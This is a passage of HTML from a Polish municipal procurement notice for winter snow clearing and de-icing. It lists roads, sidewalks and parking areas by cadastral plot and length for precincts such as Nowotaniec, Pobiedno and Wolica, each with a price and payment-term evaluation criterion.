class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 4 – obręb Nadolany<br/>	Drogi:<br/>1.	Wodnica - dz. nr ewid. 628 – 600m<br/>2.	k/ Kozimora - dz. nr ewid. 618/1, 618/2 – 175m<br/>3.	k/ Pawiaka - dz. nr ewid. 619, 620, 622 – 370m<br/>4.	k/ Rabickiego- dz. nr ewid. 636, 612, 611, 640 – 495m<br/>5.	k/ Pieszczocha – droga wojewódzka - dz. nr ewid. 616/2 – 430m<br/>6.	do dworu i k/ Stanisława Lenio - dz. nr ewid. 587/3, 603, 504(Nowotaniec) – 920m<br/>7.	k/Gorzkowskiego - dz. nr ewid. 604 – 200m<br/>8.	osiedle - dz. nr ewid. 318/11 – 100m<br/>9.	do A. Rabickiego - dz. nr ewid. 609 – 105m<br/>10.	do G. Piszczyńskiego - dz. nr ewid. 601 – 230m<br/>11.	do M. Szatkowskiego - dz. nr ewid. 608 – 60m<br/><br/>Chodniki:<br/>1.	Chodniki – 105m<br/><br/>Parkingi, place:<br/>1.	k/ przystanku na Wygnance - dz. nr ewid. 134 – 155m2<br/><br/>SUMA: drogi – 3685m, chodniki – 105m, parkingi – 155m2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Zaoferowana cena przedstawiona w ofercie obejmuje sumę zadań I, II i III w danym obrębie:<br/>I.	Koszt odśnieżanie dróg = ilość km x stawka w zł brutto/km<br/>II.	Koszt odśnieżania chodników = ilość km x stawka w zł brutto/km<br/>III.	Koszt odśnieżania parkingów/placów = ilość m2 x stawka w zł brutto/m2</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 5 – obręb Nagórzany<br/>Drogi:<br/>1.	Nagórzany wieś - dz. nr ewid. 294, 295, 297/1, 297/2, 299/1, 300, 302, 303 – 2470m<br/>2.	Nagórzany – Wola Jaworowa - dz. nr ewid. 306, 293(Wola Sękowa) – 1580m<br/>3.	K/ Piszczyńskiego - dz. nr ewid. 305 – 155m<br/>4.	do Kindlarskiego - dz. nr ewid. 284 – 390m<br/><br/>Chodniki:<br/>2.	Chodniki – 655m<br/><br/>SUMA: drogi – 4595m, chodniki – 655m </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Zaoferowana cena przedstawiona w ofercie obejmuje sumę zadań I, II i III w danym obrębie:<br/>I.	Koszt odśnieżanie dróg = ilość km x stawka w zł brutto/km<br/>II.	Koszt odśnieżania chodników = ilość km x stawka w zł brutto/km<br/>III.	Koszt odśnieżania parkingów/placów = ilość m2 x stawka w zł brutto/m2</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 6 – obręb Nowotaniec<br/>Drogi:<br/>1.	Od stadionu pod Kościołem wyjazd k/ Długosz Tomasz i Czaban do drogi wojewódzkiej<br/>- dz. nr ewid. 470 – 455m<br/>2.	Nowotaniec – kolonia-k/Pisia – do Sternik Teresy do Rakoczy i Królicki – do stadionu i drogi wojewódzkiej, 487, 474, 472, 471, 476/2 – 970m<br/>3.	Nowotaniec k/ młyna do Drozd Adama i Muszańskiego - dz. nr ewid. 503 – 255m<br/>4.	Nowotaniec kolonia k/ Mroczki - do Wójtowicza - dz. nr ewid. 495 – 690m<br/>5.	k/ Balwierczaka – do Kondyjowskiego - dz. nr ewid. 491, 489 – 320m<br/>6.	Droga Nowotaniec –Nagórzany - dz. nr ewid. 490 – 480m<br/>7.	Od drogi wojewódzkiej obok C.N. i Jakubowski do Sieradzkiego; - dz. nr ewid. 91/16 – 45m<br/>8.	Droga do Dziedzica, - dz. nr ewid. 87/2 – 45m<br/>9.	Droga do cmentarza obok posesji P. Capa - dz. nr ewid. 500 – 200m<br/>10.	Od drogi powiatowej wzdłuż posesji Muszańskiej Janiny - dz. nr ewid. 501/1 – 135m<br/>11.	Do Kozimora - dz. nr ewid. 501/2 – 30m<br/>12.	Do młyna - dz. nr ewid. 47/1 – 80m<br/><br/>Parkingi:<br/>1.	Parkingi k/szkoły, k/Ośrodka Zdrowia - dz. nr ewid. 313/5, 467/3, 53 – 1200m2<br/>2.	Parking k/Kościoła* - dz. nr ewid. 53 – 1000m2<br/><br/><br/>Chodniki:<br/>1.	Chodniki – 1400m<br/><br/>SUMA: drogi – 3705m, chodniki – 1400m, parkingi – 2200m2<br/>*UWAGA: Parking k/Kościoła odśnieżany wyłącznie w niedzielę i święta lub na polecenie sołtysa. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Zaoferowana cena przedstawiona w ofercie obejmuje sumę zadań I, II i III w danym obrębie:<br/>I.	Koszt odśnieżanie dróg = ilość km x stawka w zł brutto/km<br/>II.	Koszt odśnieżania chodników = ilość km x stawka w zł brutto/km<br/>III.	Koszt odśnieżania parkingów/placów = ilość m2 x stawka w zł brutto/m2</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 7 – obręb Płonna<br/>Drogi:<br/>1.	Do P. Czytajło dz. nr ewid. 94/6 – 190m<br/>2. Do P. Łukaszczyka dz. nr ewid. 186- 510 m<br/><br/>SUMA: drogi – 700m </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Zaoferowana cena przedstawiona w ofercie obejmuje sumę zadań I, II i III w danym obrębie:<br/>I.	Koszt odśnieżanie dróg = ilość km x stawka w zł brutto/km<br/>II.	Koszt odśnieżania chodników = ilość km x stawka w zł brutto/km<br/>III.	Koszt odśnieżania parkingów/placów = ilość m2 x stawka w zł brutto/m2</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 8 – obręb Pobiedno<br/>Drogi:<br/>1.	Dom Ludowy – Wojciechowski (nad rzeką) - dz. nr ewid. 1015, 1027/2, 1036/1 – 570m<br/>2.	Pod dworem - dz. nr ewid. - dz. nr ewid. 64 – 685m<br/>3.	Pobiedno wieś - do p. H. Bończak - dz. nr ewid. 944, 534 – 860m<br/>4.	Pobiedno droga do p. K. Bąka - dz. nr ewid. 980 – 240m<br/>5.	k/Kapliczki - dz. nr ewid. 704, 680, 694, 1078/4 – 805m<br/>6.	k/ Pałys Marian i Wiesław, Wojciechowski, Pisaniak do drogi koło p. H.Bończak - dz. nr ewid. 485 – 520m<br/>7.	Od krzyża do Pałysa - dz. nr ewid. 323 – 185m<br/>8.	Do Szorka - dz. nr ewid. 410 – 140m<br/>9.	Do p. Pisaniak - dz. nr ewid. 502 – 70m<br/>10.	Do p. Tomkiewicz - dz. nr ewid. 69 – 140m<br/><br/>Parkingi:<br/>1.	Parking k/sklepu - dz. nr ewid. 934 – 400m2<br/>2.	Parking k/Domu Ludowego - dz. nr ewid. 1017 – 500m2<br/>3.	Parking k/Remizy OSP-Biblioteki - dz. nr ewid. 74, 75 – 300m2<br/><br/>Chodniki:<br/>1.	Chodniki – 820m<br/><br/>SUMA: drogi – 4215m, chodniki – 820m, parkingi – 1200m2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Zaoferowana cena przedstawiona w ofercie obejmuje sumę zadań I, II i III w danym obrębie:<br/>I.	Koszt odśnieżanie dróg = ilość km x stawka w zł brutto/km<br/>II.	Koszt odśnieżania chodników = ilość km x stawka w zł brutto/km<br/>III.	Koszt odśnieżania parkingów/placów = ilość m2 x stawka w zł brutto/m2</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 9 – obręb Tokarnia<br/>Drogi:<br/>1.	Droga Bukowsko-Tokarnia (była powiatowa) do P. Miśki- dz. nr ewid. 526(Bukowsko), 668(Bukowsko), 248, 249/2, 250/8, 54/1, 250/7, 221/2 – 4450m<br/>2.	Do P. Krzywińskiego - dz. nr ewid. 22/2 – 300m<br/>3.	Do P. Tylki - dz. nr ewid. 36/1 – 110m<br/>4.	Do P. Karpiela - dz. nr ewid. 56/1 – 110m<br/><br/>Place:<br/>1.	Plac k/ Remizy OSP - dz. nr ewid. 49/4 – 150m2<br/><br/>SUMA: drogi – 4970m, plac – 150m2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Zaoferowana cena przedstawiona w ofercie obejmuje sumę zadań I, II i III w danym obrębie:<br/>I.	Koszt odśnieżanie dróg = ilość km x stawka w zł brutto/km<br/>II.	Koszt odśnieżania chodników = ilość km x stawka w zł brutto/km<br/>III.	Koszt odśnieżania parkingów/placów = ilość m2 x stawka w zł brutto/m2</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 10</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 10 – obręb Wola Piotrowa<br/>Drogi:<br/>1.	Od ronda do p. Byrtka - dz. nr ewid. 307 – 80m<br/>2.	Do p. Wierzganowskiego - dz. nr ewid. 1162 – 270m<br/>3.	Do bloków - dz. nr ewid. 490 – 200m<br/>4.	Do ośrodka fundacji „Latarnia” - dz. nr ewid. 178/1 – 850m<br/>5.	Do P. Jursy - dz. nr ewid. 161/2 – 55m<br/>6.	Do P. Dorda, Warzybok - dz. nr ewid. 147/1, 148, 154 – 220m<br/><br/>SUMA: drogi – 1675m </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Zaoferowana cena przedstawiona w ofercie obejmuje sumę zadań I, II i III w danym obrębie:<br/>I.	Koszt odśnieżanie dróg = ilość km x stawka w zł brutto/km<br/>II.	Koszt odśnieżania chodników = ilość km x stawka w zł brutto/km<br/>III.	Koszt odśnieżania parkingów/placów = ilość m2 x stawka w zł brutto/m2</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 11</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 11 – obręb Wola Sękowa<br/>Drogi:<br/>1.	Roztoki - dz. nr ewid. 108, 439/1 – 2035m *<br/>2.	Wola Jaworowa - do ujęcia wody dz. nr ewid. 176, 278, 225, 464 – 2560m<br/>3.	Skrzyżowanie od ujęcia wody – Wola Jaworowa do zbiorników dz. nr ewid. – 365m<br/>4.	Do Uniwersytetu - dz. nr ewid. 176 – 310m<br/>5.	Do Remizy OSP - dz. nr ewid. 138 – 75m<br/>6.	Do Harajda - dz. nr ewid. 127/2 – 60m<br/><br/>Parkingi:<br/>1.	Parking k/ Kościoła - dz. nr ewid. 39 – 400m2<br/>2.	Parking k/ Uniwersytetu - dz. nr ewid. 176 – 170m2<br/><br/>SUMA: drogi – 5405m, parkingi – 570m2<br/><br/>*UWAGA: Droga nr 1 odśnieżana na koszt Nadleśnictwa Rymanów zgodnie z porozumieniem z dnia 12 października 2022 roku. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Zaoferowana cena przedstawiona w ofercie obejmuje sumę zadań I, II i III w danym obrębie:<br/>I.	Koszt odśnieżanie dróg = ilość km x stawka w zł brutto/km<br/>II.	Koszt odśnieżania chodników = ilość km x stawka w zł brutto/km<br/>III.	Koszt odśnieżania parkingów/placów = ilość m2 x stawka w zł brutto/m2</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 12</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 12 – obręb Wolica<br/>Drogi:<br/>1.	Wolica Wólka - dz. nr ewid. 197, 220, 342 – 1565m<br/>2.	k/ b. Szkoły – do P. Karbowskiej - dz. nr ewid. 219, 210 – 785m<br/>3.	Do Kościoła - dz. nr ewid. 414 – 480m<br/>4.	Do P. Tokarskiej - dz. nr ewid. 226/1 – 70m<br/>5.	k/Cypcarz Stanisławy - dz. nr ewid. 788 – 220m<br/>6.	Rakoczy Robert do drogi powiatowej - dz. nr ewid. 441 – 350m <br/>7.	Do Morawskich- dz. Nr ewid. 401 – 205m<br/>8.	k/Gliściak do Kruczyńskiego - dz. nr ewid. 198/1, 189 – 245m<br/>9.	Do P. Gliściaka - dz. nr ewid. 225/4 – 45m<br/>10.	k/Kocik - dz. nr ewid. 275 – 25m<br/><br/>Chodniki:<br/>1.	Chodniki – 140m<br/><br/>SUMA: drogi – 3990m, chodniki – 140m </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatnosci</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 13</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 13 – obręb Zboiska<br/>Drogi:<br/>1.	Zboiska Modrza - dz. nr ewid. 240, 275, 284 – 1385m<br/>2.	k/ Futy - dz. nr ewid. 344 – 425m<br/>3.	Zboiska Ratnawica - dz. nr ewid. 475/2, 415, 451, 53(Ratnawica) – 2465m<br/>4.	Do p. Piotrowskiego - dz. nr 